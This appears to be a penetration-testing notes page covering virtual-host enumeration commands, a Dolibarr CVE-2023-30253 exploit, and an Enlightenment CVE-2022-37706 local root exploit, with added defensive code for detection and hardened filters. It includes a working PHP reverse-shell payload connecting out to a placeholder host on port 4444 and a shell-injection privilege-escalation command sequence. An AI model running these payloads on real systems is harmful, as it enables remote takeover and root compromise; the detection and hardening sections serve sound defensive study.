enum

  • gobuster

gobuster -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt vhost -u http://

  • wfuzz

wfuzz -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http:///" -H "Host: FUZZ."

  • ffuf

ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http:/// -H "Host: FUZZ." -fl 10
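All three commands above send the same request under thousands of different Host headers, so on the server side a vhost brute-force is easy to spot: one client, one path, many distinct hosts, and usually one host that answers differently (that is what ffuf's -fl 10 is filtering for). The script below is an added example, not part of the original notes: it parses constructed nginx-style access-log lines (assuming a custom log_format that appends $host as the last quoted field) and reports clients that used many distinct Host headers, along with the hosts that returned 200 to them.

```python
import re
from collections import defaultdict

# Constructed sample log lines (not from the page). Format assumed: nginx
# combined log with the Host header appended as a final quoted field.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET / HTTP/1.1" 404 153 "-" "gobuster/3.5" "admin.example.com"
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET / HTTP/1.1" 404 153 "-" "gobuster/3.5" "mail.example.com"
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET / HTTP/1.1" 404 153 "-" "gobuster/3.5" "dev.example.com"
10.0.0.5 - - [10/Oct/2023:13:55:37 +0000] "GET / HTTP/1.1" 404 153 "-" "gobuster/3.5" "test.example.com"
10.0.0.5 - - [10/Oct/2023:13:55:37 +0000] "GET / HTTP/1.1" 200 4821 "-" "gobuster/3.5" "staging.example.com"
192.168.1.20 - - [10/Oct/2023:13:55:40 +0000] "GET /index.html HTTP/1.1" 200 4821 "-" "Mozilla/5.0" "www.example.com"
192.168.1.20 - - [10/Oct/2023:13:55:41 +0000] "GET /about HTTP/1.1" 200 2210 "-" "Mozilla/5.0" "www.example.com"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)" "(?P<host>[^"]*)"$'
)


def parse_lines(text):
    """Yield one dict per well-formed line; malformed lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.groupdict()


def find_vhost_fuzzers(text, min_distinct_hosts=3):
    """Return {client_ip: (distinct_host_count, hosts_that_answered_200)} for
    clients that sent requests under at least min_distinct_hosts Host values.
    The 200 list tells the defender which name the scanner actually found."""
    hosts_by_ip = defaultdict(set)
    hits_by_ip = defaultdict(set)
    for rec in parse_lines(text):
        hosts_by_ip[rec["ip"]].add(rec["host"])
        if rec["status"] == "200":
            hits_by_ip[rec["ip"]].add(rec["host"])
    return {
        ip: (len(hosts), sorted(hits_by_ip[ip]))
        for ip, hosts in hosts_by_ip.items()
        if len(hosts) >= min_distinct_hosts
    }


if __name__ == "__main__":
    for ip, (count, hits) in find_vhost_fuzzers(SAMPLE_LOG).items():
        print(f"{ip}: {count} distinct Host headers, 200 from {hits}")
```

The threshold is deliberately low for the seven-line sample; on a real server, count per time window and tune it to the number of legitimate names the host serves. The mitigation side is the mirror image of the -fl filter: if the default server block answers every unknown Host identically to the real ones, the scanner has nothing to diff against.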

CVE-2023-30253

Dolibarr is a web-based suite of features for managing all aspects of your business, from CRM and sales to accounting and manufacturing. It is customisable, extensible, and available on various platforms, as a local or cloud application.

  • This is an input-validation flaw: the filter that blocks the php keyword is case-sensitive, so it can be bypassed with mixed-case letters, e.g. PHP, PhP
  • Common config file path: conf/conf.php
  • To exploit this vulnerability, one needs to check that the current user has read/write permission to website/content at http://site/user/perms.php
  • Then create a website and page at http://site/website/index.php
  • When creating the page, enable the show dynamic content option
  • Example payload for reverse shell:
<section id="mysection1" contenteditable="true">
<?PHP
echo system('python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\'');
?>
</section>
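The root cause in the note above is a deny-list that matches one spelling of the open tag. As an added example (illustrative code, not Dolibarr's), the block below puts the case-sensitive check beside a check anchored on the two characters every PHP open tag shares, and runs both over a constructed page body shaped like the payload above with the command replaced by a harmless echo.

```python
import re

# Constructed sample in the shape of the payload above (not from the page);
# the reverse-shell command is replaced by a harmless echo.
SAMPLE_PAGE = (
    '<section id="mysection1" contenteditable="true">\n'
    '<?PHP echo "hello"; ?>\n'
    '</section>'
)


def weak_php_filter(content):
    """Case-sensitive substring check: the flaw class the note describes.
    Returns True when the content is accepted."""
    return "<?php" not in content


# '<?php', '<?=' and the short tag '<?' all start with '<?', and PHP matches
# the 'php' part case-insensitively, so anchoring the check on '<?' removes
# the case question entirely. '<?xml' is also caught; for user-supplied page
# bodies that is the conservative trade-off.
PHP_OPEN_TAG = re.compile(r"<\?")


def hardened_php_filter(content):
    """Reject any PHP open tag regardless of letter case."""
    return PHP_OPEN_TAG.search(content) is None


def find_php_tags(content):
    """Offsets of every open tag, for a rejection message or an audit log."""
    return [m.start() for m in PHP_OPEN_TAG.finditer(content)]


if __name__ == "__main__":
    print("weak filter accepts sample:", weak_php_filter(SAMPLE_PAGE))
    print("hardened filter accepts sample:", hardened_php_filter(SAMPLE_PAGE))
    print("tag offsets:", find_php_tags(SAMPLE_PAGE))
```

A keyword filter is only a backstop: the stronger fix is to never hand user-editable page content to the PHP interpreter at all, and to keep the website edit permission the note mentions (user/perms.php) restricted to trusted accounts.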

CVE-2022-37706

enlightenment_sys in Enlightenment before 0.25.4 allows local users to gain privileges because it is setuid root, and the system library function mishandles pathnames that begin with a /dev/.. substring.

mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
enlightenment_sys /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
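The commands above work because the helper checks the device argument by string prefix before it has been canonicalized, and then builds a shell command from it, so "/dev/../tmp/;/tmp/exploit" passes the prefix test and the ";" splits the command. As an added example (illustrative Python, not Enlightenment's code), the block below shows that check pattern beside a version that canonicalizes first, refuses shell metacharacters, and builds an argv list so no shell is involved.

```python
import os
import re

# Characters a command string handed to system(3) would interpret; a setuid
# helper that builds a shell command from user input must reject them, and
# should preferably not go through a shell at all.
SHELL_META = re.compile(r"[;&|`$(){}<>\n\\'\"\s]")


def weak_device_check(path):
    """Prefix check on the raw string: the pattern the note above describes.
    Accepts '/dev/../tmp/;/tmp/exploit' because it starts with '/dev/'."""
    return path.startswith("/dev/")


def hardened_device_check(path):
    """Return (accepted, reason). Reject metacharacters, then canonicalize
    ('..' and symlinks) and require the canonical form to be the one given
    and to live under /dev/."""
    if SHELL_META.search(path):
        return False, "shell metacharacter or whitespace in path"
    canonical = os.path.realpath(path)
    if canonical != path:
        return False, f"path is not canonical (resolves to {canonical})"
    if not canonical.startswith("/dev/"):
        return False, "not under /dev/"
    return True, "ok"


def mount_argv(device, mountpoint, options):
    """argv for the helper to execve() directly; each argument stays one
    argument, so a ';' inside device could never start a second command."""
    return ["/bin/mount", "-o", options, device, mountpoint]


if __name__ == "__main__":
    for p in ["/dev/sda1", "/dev/../tmp/;/tmp/exploit", "/dev/../tmp/x"]:
        print(p, "weak:", weak_device_check(p), "hardened:", hardened_device_check(p))
```

Requiring the canonical path to equal the submitted one rejects legitimate symlinked device names (for example under /dev/disk/), which is the safer default for a setuid helper; if those must be allowed, resolve the symlink and apply the prefix check to the target instead, but keep the metacharacter rejection and the argv-based exec.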